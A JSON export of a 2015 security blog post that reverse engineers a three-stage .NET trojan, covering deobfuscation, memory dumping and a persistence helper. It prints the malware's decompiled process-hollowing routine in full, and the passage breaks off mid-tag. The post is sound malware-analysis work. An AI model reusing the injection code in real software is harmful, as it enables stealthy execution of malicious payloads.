{"id":1156,"date":"2015-09-25T09:11:14","date_gmt":"2015-09-25T09:11:14","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=1156"},"modified":"2015-09-29T19:12:10","modified_gmt":"2015-09-29T19:12:10","slug":"3-stage-dot-net-trojan","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2015\/09\/3-stage-dot-net-trojan\/","title":{"rendered":"3 stage dot net Trojan"},"content":{"rendered":"<p>Howdy fellow readers. My time is split between video games, code, and work. I have a number of interesting samples I&#8217;ve seen that I&#8217;ve decided to share with you all.<\/p>\n<p>This is a 3+ stage malware. Each stage meaning its own executable (think inception, but with exes). This isn&#8217;t all that uncommon with malware. Typically the file you first download isn&#8217;t always the main exe. The &#8220;dropper&#8221; will determine your sys info and download the second stage, or the second stage will be hidden away encrypted to hide from AV&#8217;s and heuristics. <\/p>\n<p>The <a href=\"https:\/\/www.virustotal.com\/en\/file\/8e3602a83178039c076b74cc38d8fdf502b1a1a1a3c312b5a0700c682524ae8d\/analysis\/\" target=\"_blank\">file<\/a><\/p>\n<p>SHA256: \t8e3602a83178039c076b74cc38d8fdf502b1a1a1a3c312b5a0700c682524ae8d<br \/>\nFile name: \tmanptca.exe<br \/>\nDetection ratio: \t35 \/ 57<br \/>\nAnalysis date: \t2015-09-16 21:18:29 UTC ( 1 week, 1 day ago ) <\/p>\n<p>First thing I do is load the guy up with CFF Explorer and explore&#8230;<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p1.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p1.png\" alt=\"p1\" width=\"374\" height=\"434\" class=\"alignnone size-full wp-image-1158\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p1.png 749w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p1-259x300.png 259w\" sizes=\"(max-width: 374px) 100vw, 374px\" \/><\/a><\/p>\n<p>Sample is .net, but I already knew that. The version is 2.0 (version string in the Metadata header).<\/p>\n<p>Since it&#8217;s a .NET binary, we can load the sample into ilspy, or reflector, or some sort of decompiler.<\/p>\n<p><a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p2-2.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p2-2-300x260.png\" alt=\"p2-2\" width=\"300\" height=\"260\" class=\"alignnone size-medium wp-image-1171\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p2-2-300x260.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p2-2.png 886w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>As we can see, the sample is obfuscated. I also see a bitmap stored as a resource named &#8216;jucausa&#8217;. More on that image later and how it relates to our stage 3. <\/p>\n<p>Easiest way to defeat most obfuscation is a little utility called <a href=\"https:\/\/github.com\/0xd4d\/de4dot\" target=\"_blank\">. Just compile, drag, and drop. <\/p>\n<p><a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p3.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p3.png\" alt=\"p3\" width=\"339\" height=\"171\" class=\"alignnone size-full wp-image-1160\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p3.png 677w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p3-300x152.png 300w\" sizes=\"(max-width: 339px) 100vw, 339px\" \/><\/a><\/p>\n<p>As you can see, de4dot identified the obfuscator and automatically changed everything back to normal. Nice eh? Now let&#8217;s look at the binary again in ilspy (Reflector is a piece of shit sometimes). <\/p>\n<p><a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p4.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p4-300x164.png\" alt=\"p4\" width=\"300\" height=\"164\" class=\"alignnone size-medium wp-image-1161\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p4-300x164.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p4-1024x558.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p4.png 1313w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>The sample has been deobfuscated, but is still a mess. What can we do? Enter <a href=\"http:\/\/www.gironsec.com\/code\/MegaDumper.zip\" target=\"_blank\">MegaDumper<\/a>. Russians make the best tools. So how does this work? Well, MegaDumper allows us to dump .net binaries straight from memory. All we have to do is run the exe, suspend its main thread, then dump away.<\/p>\n<p>It&#8217;s easier to just record how its done here:<br \/>\n<iframe loading=\"lazy\" width=\"420\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/MoLmpryw6kw\" frameborder=\"0\" allowfullscreen><\/iframe><\/p>\n<p>Now we have our decrypted content.<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p5.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p5.png\" alt=\"p5\" width=\"782\" height=\"398\" class=\"alignnone size-full wp-image-1162\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p5.png 782w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p5-300x153.png 300w\" sizes=\"(max-width: 782px) 100vw, 782px\" \/><\/a><\/p>\n<p>The &#8216;manptca.exe&#8217; file is our original file. The other 2 files are loaded by the original binary. Let&#8217;s peek at each.<\/p>\n<p>&#8216;snoop.exe&#8217; seems to be obfuscated, however a quick run through De4dot shows us what it is.<\/p>\n<p>Opening the thing up with ilspy, we see a number of dynamically constructed strings.<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p7.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p7-300x169.png\" alt=\"p7\" width=\"300\" height=\"169\" class=\"alignnone size-medium wp-image-1163\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p7-300x169.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p7-1024x576.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p7.png 1920w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nThis is one reason why being a coder helps with reversing &#8211; having the compiler by your side is a life saver.<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p8.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p8-300x173.png\" alt=\"p8\" width=\"300\" height=\"173\" class=\"alignnone size-medium wp-image-1164\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p8-300x173.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p8-1024x591.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p8.png 1721w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Just reviewing the code, this looks to be a helper exe, in that it &#8216;helps&#8217; the main exe maintain persistence (add exe to registry startup path). Not very interesting.<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1333091162618.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1333091162618.png\" alt=\"1333091162618\" width=\"493\" height=\"402\" class=\"alignnone size-full wp-image-1165\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1333091162618.png 493w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1333091162618-300x245.png 300w\" sizes=\"(max-width: 493px) 100vw, 493px\" \/><\/a><\/p>\n<p>&#8216;mydllclass&#8217; is much more interesting.<\/p>\n<p>The sample contains our process hollowing methods and injection criteria, some interesting decryption, and our final stage 3 product. <\/p>\n<p>The following is some code I pulled from the mydllclass module. It should look familiar. For those who don&#8217;t know, its <a href=\"http:\/\/www.autosectools.com\/process-hollowing.pdf\" target=\"_blank\">process hollowing<\/a> code. <\/p>\n<p><!-- HTML generated using hilite.me --><\/p>\n<div style=\"background: #000000; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\"><span style=\"color: #cdcd00\">internal<\/span> <span style=\"color: #cdcd00\">static<\/span> <span style=\"color: #00cd00\">bool<\/span> <span style=\"color: #cccccc\">HandleRun(<\/span><span style=\"color: #00cd00\">string<\/span> <span style=\"color: #cccccc\">path,<\/span> <span style=\"color: #00cd00\">string<\/span> <span style=\"color: #cccccc\">cmd,<\/span> <span style=\"color: #00cd00\">byte<\/span><span style=\"color: #cccccc\">[]<\/span> <span style=\"color: #cccccc\">data,<\/span> <span style=\"color: #00cd00\">bool<\/span> <span style=\"color: #cccccc\">compatible)<\/span>\r\n<span style=\"color: #cccccc\">{<\/span>\r\n  <span style=\"color: #cccccc\">NewRP.ProcessId<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">-<\/span><span style=\"color: #cd00cd\">1<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  <span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">readWrite<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  <span style=\"color: #cccccc\">NewRP.STARTUP_INFORMATION<\/span> <span style=\"color: #cccccc\">sI<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">default<\/span><span style=\"color: #cccccc\">(NewRP.STARTUP_INFORMATION);<\/span>\r\n  <span style=\"color: #cccccc\">NewRP.PROCESS_INFORMATION<\/span> <span style=\"color: #cccccc\">pROCESS_INFORMATION<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">default<\/span><span style=\"color: #cccccc\">(NewRP.PROCESS_INFORMATION);<\/span>\r\n  <span style=\"color: #cccccc\">sI.Size<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">Convert.ToUInt32(Marshal.SizeOf(<\/span><span style=\"color: #cdcd00\">typeof<\/span><span style=\"color: #cccccc\">(NewRP.STARTUP_INFORMATION)));<\/span>\r\n  <span style=\"color: #cdcd00\">try<\/span>\r\n  <span style=\"color: #cccccc\">{<\/span>\r\n  \t<span style=\"color: #00cd00\">string<\/span> <span style=\"color: #cccccc\">text<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #00cd00\">string<\/span><span style=\"color: #cccccc\">.Format(<\/span><span style=\"color: #cd0000\">&quot;\\&quot;{0}\\&quot;&quot;<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cccccc\">path);<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(!<\/span><span style=\"color: #00cd00\">string<\/span><span style=\"color: #cccccc\">.IsNullOrEmpty(cmd))<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cccccc\">text<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">text<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd0000\">&quot; &quot;<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cccccc\">cmd;<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #cccccc\">pROCESS_INFORMATION<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">Fixes.ProcessInformation(path,<\/span> <span style=\"color: #cccccc\">text,<\/span> <span style=\"color: #cccccc\">sI,<\/span> <span style=\"color: #cccccc\">pROCESS_INFORMATION);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cd00cd\">60<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num2<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">52<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span><span style=\"color: #cccccc\">[]<\/span> <span style=\"color: #cccccc\">array<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #00cd00\">int<\/span><span style=\"color: #cccccc\">[<\/span><span style=\"color: #cd00cd\">179<\/span><span style=\"color: #cccccc\">];<\/span>\r\n  \t<span style=\"color: #cccccc\">array[<\/span><span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">]<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cd00cd\">65538<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  \t<span style=\"color: #cccccc\">Pack.GetValue(pROCESS_INFORMATION,<\/span> <span style=\"color: #cccccc\">array);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num3<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">array[<\/span><span style=\"color: #cd00cd\">41<\/span><span style=\"color: #cccccc\">];<\/span>\r\n  \t<span style=\"color: #cccccc\">Pack.GetValueA(pROCESS_INFORMATION,<\/span> <span style=\"color: #cccccc\">num3,<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cccccc\">readWrite,<\/span> <span style=\"color: #cccccc\">num2);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">length<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">80<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">bufferSize<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">84<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #00cd00\">bool<\/span> <span style=\"color: #cccccc\">flag<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">false<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num4<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">NewRP.VirtualAllocEx(pROCESS_INFORMATION.ProcessHandle,<\/span> <span style=\"color: #cccccc\">num2,<\/span> <span style=\"color: #cccccc\">length,<\/span> <span style=\"color: #cd00cd\">12288<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cd00cd\">64<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(!compatible<\/span> <span style=\"color: #cccccc\">&amp;&amp;<\/span> <span style=\"color: #cccccc\">num4<\/span> <span style=\"color: #cccccc\">==<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">)<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cccccc\">flag<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">true<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  \t\t<span style=\"color: #cccccc\">num4<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">NewRP.VirtualAllocEx(pROCESS_INFORMATION.ProcessHandle,<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cccccc\">length,<\/span> <span style=\"color: #cd00cd\">12288<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cd00cd\">64<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(num4<\/span> <span style=\"color: #cccccc\">==<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">)<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cdcd00\">throw<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">Exception();<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(!NewRP.WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle,<\/span> <span style=\"color: #cccccc\">num4,<\/span> <span style=\"color: #cccccc\">data,<\/span> <span style=\"color: #cccccc\">bufferSize,<\/span> <span style=\"color: #cdcd00\">out<\/span> <span style=\"color: #cccccc\">readWrite))<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cdcd00\">throw<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">Exception();<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num5<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">num<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">248<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  \t<span style=\"color: #00cd00\">short<\/span> <span style=\"color: #cccccc\">num6<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt16(data,<\/span> <span style=\"color: #cccccc\">num<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">6<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #cdcd00\">for<\/span> <span style=\"color: #cccccc\">(<\/span><span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">i<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">;<\/span> <span style=\"color: #cccccc\">i<\/span> <span style=\"color: #cccccc\">&lt;=<\/span> <span style=\"color: #cccccc\">(<\/span><span style=\"color: #00cd00\">int<\/span><span style=\"color: #cccccc\">)(num6<\/span> <span style=\"color: #cccccc\">-<\/span> <span style=\"color: #cd00cd\">1<\/span><span style=\"color: #cccccc\">);<\/span> <span style=\"color: #cccccc\">i++)<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num7<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num5<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">12<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t\t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num8<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num5<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">16<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t\t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">srcOffset<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num5<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">20<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t\t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(num8<\/span> <span style=\"color: #cccccc\">!=<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">)<\/span>\r\n  \t\t<span style=\"color: #cccccc\">{<\/span>\r\n    <span style=\"color: #00cd00\">byte<\/span><span style=\"color: #cccccc\">[]<\/span> <span style=\"color: #cccccc\">array2<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #00cd00\">byte<\/span><span style=\"color: #cccccc\">[num8];<\/span>\r\n    <span style=\"color: #cccccc\">Buffer.BlockCopy(data,<\/span> <span style=\"color: #cccccc\">srcOffset,<\/span> <span style=\"color: #cccccc\">array2,<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cccccc\">array2.Length);<\/span>\r\n    <span style=\"color: #cccccc\">NewRP.WWriteProcessMemory<\/span> <span style=\"color: #cccccc\">arg_1A3_0<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">NewRP.WriteProcessMemory;<\/span>\r\n    <span style=\"color: #cccccc\">IntPtr<\/span> <span style=\"color: #cccccc\">arg_1A3_1<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">pROCESS_INFORMATION.ProcessHandle;<\/span>\r\n    <span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">arg_1A3_2<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">num4<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cccccc\">num7;<\/span>\r\n    <span style=\"color: #00cd00\">byte<\/span><span style=\"color: #cccccc\">[]<\/span> <span style=\"color: #cccccc\">expr_19E<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">array2;<\/span>\r\n    <span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(!arg_1A3_0(arg_1A3_1,<\/span> <span style=\"color: #cccccc\">arg_1A3_2,<\/span> <span style=\"color: #cccccc\">expr_19E,<\/span> <span style=\"color: #cccccc\">expr_19E.Length,<\/span> <span style=\"color: #cdcd00\">out<\/span> <span style=\"color: #cccccc\">readWrite))<\/span>\r\n    <span style=\"color: #cccccc\">{<\/span>\r\n    \t<span style=\"color: #cdcd00\">throw<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">Exception();<\/span>\r\n    <span style=\"color: #cccccc\">}<\/span>\r\n  \t\t<span style=\"color: #cccccc\">}<\/span>\r\n  \t\t<span style=\"color: #cccccc\">num5<\/span> <span style=\"color: #cccccc\">+=<\/span> <span style=\"color: #cd00cd\">40<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #00cd00\">byte<\/span><span style=\"color: #cccccc\">[]<\/span> <span style=\"color: #cccccc\">bytes<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">Fixes.GetBytes(num4);<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(!NewRP.WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle,<\/span> <span style=\"color: #cccccc\">num3<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">8<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cccccc\">bytes,<\/span> <span style=\"color: #cd00cd\">4<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cdcd00\">out<\/span> <span style=\"color: #cccccc\">readWrite))<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cdcd00\">throw<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">Exception();<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #cccccc\">NewRP.WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle,<\/span> <span style=\"color: #cccccc\">num3<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">8<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cccccc\">bytes,<\/span> <span style=\"color: #cd00cd\">4<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cdcd00\">out<\/span> <span style=\"color: #cccccc\">readWrite);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num9<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">Class1.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num);<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(flag)<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cccccc\">num4<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">num2;<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #cccccc\">array[<\/span><span style=\"color: #cd00cd\">44<\/span><span style=\"color: #cccccc\">]<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">num4<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cccccc\">num9;<\/span>\r\n  \t<span style=\"color: #cccccc\">Fixes.GetValueB(pROCESS_INFORMATION,<\/span> <span style=\"color: #cccccc\">array);<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">((<\/span><span style=\"color: #00cd00\">ulong<\/span><span style=\"color: #cccccc\">)NewRP.ResumeThread(pROCESS_INFORMATION.ThreadHandle)<\/span> <span style=\"color: #cccccc\">==<\/span> <span style=\"color: #cd00cd\">18446744073709551615<\/span><span style=\"color: #cccccc\">uL)<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cdcd00\">throw<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">Exception();<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  <span style=\"color: #cccccc\">}<\/span>\r\n  <span style=\"color: #cdcd00\">catch<\/span>\r\n  <span style=\"color: #cccccc\">{<\/span>\r\n  \t<span style=\"color: #cccccc\">Process<\/span> <span style=\"color: #cccccc\">expr_251<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">Class1.GetProcessById(pROCESS_INFORMATION);<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(expr_251<\/span> <span style=\"color: #cccccc\">!=<\/span> <span style=\"color: #cdcd00\">null<\/span><span style=\"color: #cccccc\">)<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cccccc\">expr_251.Kill();<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #cdcd00\">return<\/span> <span style=\"color: #cdcd00\">false<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  <span style=\"color: #cccccc\">}<\/span>\r\n  <span style=\"color: #cccccc\">NewRP.ProcessId<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">(<\/span><span style=\"color: #00cd00\">int<\/span><span style=\"color: #cccccc\">)pROCESS_INFORMATION.ProcessId;<\/span>\r\n  <span style=\"color: #cdcd00\">return<\/span> <span style=\"color: #cdcd00\">true<\/span><span style=\"color: #cccccc\">;<\/span>\r\n<span style=\"color: #cccccc\">}<\/span>\r\n<\/pre>\n<\/div>\n<p>How is this used \/ implemented? Remember the bitmap from earlier in the resources section? This data file is decrypted in stage 2 and ran for stage 3 via process hollowing.<\/p>\n<p><a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p10.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p10-300x115.png\" alt=\"p10\" width=\"300\" height=\"115\" class=\"alignnone size-medium wp-image-1172\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p10-300x115.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p10-1024x393.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p10.png 1377w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>There&#8217;s a lot of code to this sample, but it&#8217;s fairly straight forward. The bitmap image is read from the resources directory, converted to a byte array, the stream is them decompressed, then decrypted.<br \/>\n<a 